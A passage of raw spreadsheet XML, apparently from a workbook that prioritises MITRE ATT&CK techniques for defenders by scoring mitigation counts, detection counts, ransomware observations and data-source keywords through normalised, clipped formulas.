        <v>0.13200000000000001</v>
      </c>
      <c r="AJ317" s="25" t="str" cm="1">
        <f t="array" ref="AJ317">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC317)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK317" s="25">
        <f>IF(AJ317="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL317" s="25" t="str" cm="1">
        <f t="array" ref="AL317">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC317)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM317" s="25">
        <f>IF(AL317="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN317" s="60">
        <v>0</v>
      </c>
      <c r="AO317" s="51">
        <v>0</v>
      </c>
      <c r="AP317" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6413333333333341E-2</v>
      </c>
      <c r="AQ317" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.8044444444444467E-2</v>
      </c>
      <c r="AR317" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.8044444444444467E-2</v>
      </c>
      <c r="AS317" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT317" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU31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18" spans="1:47" ht="32.1">
      <c r="A318" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6413333333333341E-2</v>
      </c>
      <c r="B318" s="25">
        <f>SUM(H318,M318,V318)*(1+SUM(AE318,AG318,AI318,AK318,AM318))</f>
        <v>0.26413333333333339</v>
      </c>
      <c r="C318" s="25" t="s">
        <v>1300</v>
      </c>
      <c r="D318" s="25" t="s">
        <v>283</v>
      </c>
      <c r="E318" s="25" t="s">
        <v>1301</v>
      </c>
      <c r="F318" s="51">
        <v>1</v>
      </c>
      <c r="G318" s="51">
        <v>1</v>
      </c>
      <c r="H318" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I318">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J318">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K318">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L318">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M318" s="25">
        <v>0</v>
      </c>
      <c r="N318" s="51">
        <v>0</v>
      </c>
      <c r="O318" s="51">
        <v>2</v>
      </c>
      <c r="P318" s="51">
        <v>0</v>
      </c>
      <c r="Q318" s="51">
        <v>0</v>
      </c>
      <c r="R318" s="52" t="s">
        <v>284</v>
      </c>
      <c r="S318" s="51">
        <v>5</v>
      </c>
      <c r="T318" s="51" t="s">
        <v>157</v>
      </c>
      <c r="U318" s="51">
        <v>8</v>
      </c>
      <c r="V318" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W318">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>13</v>
      </c>
      <c r="X318">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Y318">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Z318">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA318">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB318">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC318" s="29" t="s">
        <v>285</v>
      </c>
      <c r="AD318" s="25" t="str" cm="1">
        <f t="array" ref="AD318">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC318)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE318" s="25">
        <f>IF(AD318="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF318" s="25" t="str" cm="1">
        <f t="array" ref="AF318">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC318)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG318" s="25">
        <f>IF(AF318="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH318" s="25" t="str" cm="1">
        <f t="array" ref="AH318">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC318)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI318" s="25">
        <f>IF(AH318="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ318" s="25" t="str" cm="1">
        <f t="array" ref="AJ318">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC318)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK318" s="25">
        <f>IF(AJ318="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL318" s="25" t="str" cm="1">
        <f t="array" ref="AL318">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC318)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM318" s="25">
        <f>IF(AL318="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN318" s="52">
        <v>0</v>
      </c>
      <c r="AO318" s="51">
        <v>0</v>
      </c>
      <c r="AP318" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6413333333333341E-2</v>
      </c>
      <c r="AQ318" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.8044444444444467E-2</v>
      </c>
      <c r="AR318" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.8044444444444467E-2</v>
      </c>
      <c r="AS318" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT318" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU31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19" spans="1:47" ht="32.1">
      <c r="A319" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6413333333333341E-2</v>
      </c>
      <c r="B319" s="25">
        <f>SUM(H319,M319,V319)*(1+SUM(AE319,AG319,AI319,AK319,AM319))</f>
        <v>0.26413333333333339</v>
      </c>
      <c r="C319" s="25" t="s">
        <v>1302</v>
      </c>
      <c r="D319" s="25" t="s">
        <v>283</v>
      </c>
      <c r="E319" s="25" t="s">
        <v>1303</v>
      </c>
      <c r="F319" s="51">
        <v>1</v>
      </c>
      <c r="G319" s="51">
        <v>1</v>
      </c>
      <c r="H319" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I319">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J319">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K319">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L319">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M319" s="25">
        <v>0</v>
      </c>
      <c r="N319" s="51">
        <v>0</v>
      </c>
      <c r="O319" s="51">
        <v>2</v>
      </c>
      <c r="P319" s="51">
        <v>0</v>
      </c>
      <c r="Q319" s="51">
        <v>0</v>
      </c>
      <c r="R319" s="52" t="s">
        <v>284</v>
      </c>
      <c r="S319" s="51">
        <v>5</v>
      </c>
      <c r="T319" s="51" t="s">
        <v>157</v>
      </c>
      <c r="U319" s="51">
        <v>8</v>
      </c>
      <c r="V319" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W319">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>13</v>
      </c>
      <c r="X319">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Y319">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Z319">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA319">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB319">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC319" s="29" t="s">
        <v>285</v>
      </c>
      <c r="AD319" s="25" t="str" cm="1">
        <f t="array" ref="AD319">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC319)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE319" s="25">
        <f>IF(AD319="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF319" s="25" t="str" cm="1">
        <f t="array" ref="AF319">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC319)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG319" s="25">
        <f>IF(AF319="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH319" s="25" t="str" cm="1">
        <f t="array" ref="AH319">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC319)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI319" s="25">
        <f>IF(AH319="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ319" s="25" t="str" cm="1">
        <f t="array" ref="AJ319">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC319)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK319" s="25">
        <f>IF(AJ319="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL319" s="25" t="str" cm="1">
        <f t="array" ref="AL319">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC319)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM319" s="25">
        <f>IF(AL319="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN319" s="60">
        <v>0</v>
      </c>
      <c r="AO319" s="51">
        <v>0</v>
      </c>
      <c r="AP319" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6413333333333341E-2</v>
      </c>
      <c r="AQ319" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.8044444444444467E-2</v>
      </c>
      <c r="AR319" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.8044444444444467E-2</v>
      </c>
      <c r="AS319" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT319" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU31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20" spans="1:47" ht="48">
      <c r="A320" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1033333333333333E-2</v>
      </c>
      <c r="B320" s="25">
        <f>SUM(H320,M320,V320)*(1+SUM(AE320,AG320,AI320,AK320,AM320))</f>
        <v>0.31033333333333335</v>
      </c>
      <c r="C320" s="25" t="s">
        <v>1304</v>
      </c>
      <c r="D320" s="25" t="s">
        <v>124</v>
      </c>
      <c r="E320" s="25" t="s">
        <v>1305</v>
      </c>
      <c r="F320" s="51">
        <v>1</v>
      </c>
      <c r="G320" s="51">
        <v>1</v>
      </c>
      <c r="H320" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I320">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J320">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K320">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L320">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M320" s="25">
        <v>0</v>
      </c>
      <c r="N320" s="51">
        <v>0</v>
      </c>
      <c r="O320" s="51">
        <v>0</v>
      </c>
      <c r="P320" s="51">
        <v>0</v>
      </c>
      <c r="Q320" s="51">
        <v>0</v>
      </c>
      <c r="R320" s="52" t="s">
        <v>1179</v>
      </c>
      <c r="S320" s="51">
        <v>6</v>
      </c>
      <c r="T320" s="52" t="s">
        <v>673</v>
      </c>
      <c r="U320" s="51">
        <v>8</v>
      </c>
      <c r="V320" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W320">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X320">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y320">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z320">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA320">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB320">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC320" s="29" t="s">
        <v>1306</v>
      </c>
      <c r="AD320" s="25" t="str" cm="1">
        <f t="array" ref="AD320">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC320)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE320" s="25">
        <f>IF(AD320="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF320" s="25" t="str" cm="1">
        <f t="array" ref="AF320">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC320)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG320" s="25">
        <f>IF(AF320="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH320" s="25" t="str" cm="1">
        <f t="array" ref="AH320">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC320)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI320" s="25">
        <f>IF(AH320="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ320" s="25" t="str" cm="1">
        <f t="array" ref="AJ320">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC320)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK320" s="25">
        <f>IF(AJ320="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL320" s="25" t="str" cm="1">
        <f t="array" ref="AL320">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC320)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM320" s="25">
        <f>IF(AL320="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN320" s="60">
        <v>0</v>
      </c>
      <c r="AO320" s="51">
        <v>0</v>
      </c>
      <c r="AP320" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1033333333333333E-2</v>
      </c>
      <c r="AQ320" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10344444444444445</v>
      </c>
      <c r="AR320" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10344444444444445</v>
      </c>
      <c r="AS320" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT320" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU32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21" spans="1:47" ht="32.1">
      <c r="A321" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1033333333333333E-2</v>
      </c>
      <c r="B321" s="25">
        <f>SUM(H321,M321,V321)*(1+SUM(AE321,AG321,AI321,AK321,AM321))</f>
        <v>0.31033333333333335</v>
      </c>
      <c r="C321" s="25" t="s">
        <v>1307</v>
      </c>
      <c r="D321" s="25" t="s">
        <v>271</v>
      </c>
      <c r="E321" s="25" t="s">
        <v>1308</v>
      </c>
      <c r="F321" s="51">
        <v>1</v>
      </c>
      <c r="G321" s="51">
        <v>1</v>
      </c>
      <c r="H321" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I321">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J321">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K321">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L321">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M321" s="25">
        <v>0</v>
      </c>
      <c r="N321" s="51">
        <v>1</v>
      </c>
      <c r="O321" s="51">
        <v>4</v>
      </c>
      <c r="P321" s="51">
        <v>2</v>
      </c>
      <c r="Q321" s="51">
        <v>1</v>
      </c>
      <c r="R321" s="52" t="s">
        <v>246</v>
      </c>
      <c r="S321" s="51">
        <v>4</v>
      </c>
      <c r="T321" s="52" t="s">
        <v>1309</v>
      </c>
      <c r="U321" s="51">
        <v>6</v>
      </c>
      <c r="V321" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W321">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>10</v>
      </c>
      <c r="X321">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Y321">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Z321">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>8</v>
      </c>
      <c r="AA321">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.08</v>
      </c>
      <c r="AB321">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.08</v>
      </c>
      <c r="AC321" s="29" t="s">
        <v>1310</v>
      </c>
      <c r="AD321" s="25" t="str" cm="1">
        <f t="array" ref="AD321">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC321)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE321" s="25">
        <f>IF(AD321="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF321" s="25" t="str" cm="1">
        <f t="array" ref="AF321">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC321)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG321" s="25">
        <f>IF(AF321="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH321" s="25" t="str" cm="1">
        <f t="array" ref="AH321">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC321)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI321" s="25">
        <f>IF(AH321="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ321" s="25" t="str" cm="1">
        <f t="array" ref="AJ321">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC321)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK321" s="25">
        <f>IF(AJ321="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL321" s="25" t="str" cm="1">
        <f t="array" ref="AL321">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC321)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM321" s="25">
        <f>IF(AL321="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN321" s="52">
        <v>0</v>
      </c>
      <c r="AO321" s="51">
        <v>0</v>
      </c>
      <c r="AP321" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1033333333333333E-2</v>
      </c>
      <c r="AQ321" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10344444444444445</v>
      </c>
      <c r="AR321" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10344444444444445</v>
      </c>
      <c r="AS321" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT321" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU32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22" spans="1:47" ht="48">
